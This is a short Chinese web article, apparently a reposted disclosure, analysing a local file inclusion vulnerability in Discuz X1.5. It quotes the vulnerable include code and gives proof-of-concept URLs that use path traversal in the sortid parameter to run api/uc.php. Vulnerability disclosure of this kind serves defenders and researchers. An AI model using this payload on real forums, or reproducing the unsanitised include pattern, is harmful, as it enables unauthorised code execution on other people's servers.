手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >DISCUZ X1.5 本地文件包含漏洞
DISCUZ X1.5 本地文件包含漏洞
摘要:DISCUZX1.5本地文件包含,当然是有条件的,就是使用文件作为缓存。config_global.php$_config['cache']...

DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存。

config_global.php

$_config['cache']['type'] = ‘file’;

function cachedata($cachenames) {

……

$isfilecache = getglobal(‘config/cache/type’) == ‘file’;

……

if($isfilecache) {

$lostcaches = array();

foreach($cachenames as $cachename) {

if(!@include_once(DISCUZ_ROOT.’./data/cache/cache_’.$cachename.’.php’)) {

$lostcaches[] = $cachename;

}

}

……

}

地址:

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

http://localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/ucAuthracation has expiried

执行了 api/uc.php 页面代码了。

作者: Jannock

【DISCUZ X1.5 本地文件包含漏洞】相关文章:

Numara MRchat.pl MRABLoad2.pl远程命令执行漏洞

科汛 KesionCMS 文件名解析漏洞

Linux Kiss Server多个格式串处理漏洞

PHPWIND1.3.6论坛漏洞分析

DISCUZ X1.5 本地文件包含漏洞说明

Discuz 娱乐大厅插件V1.0 注入漏洞

最容易被忽略的五个开源软件安全漏洞

PHPWIND & DISCUZ! CSRF漏洞

OpenBSD DHCPD 服务程序远程栈溢出漏洞

Linux Kernel vmsplice_to_pipe本地权限提升漏洞

精品推荐
分类导航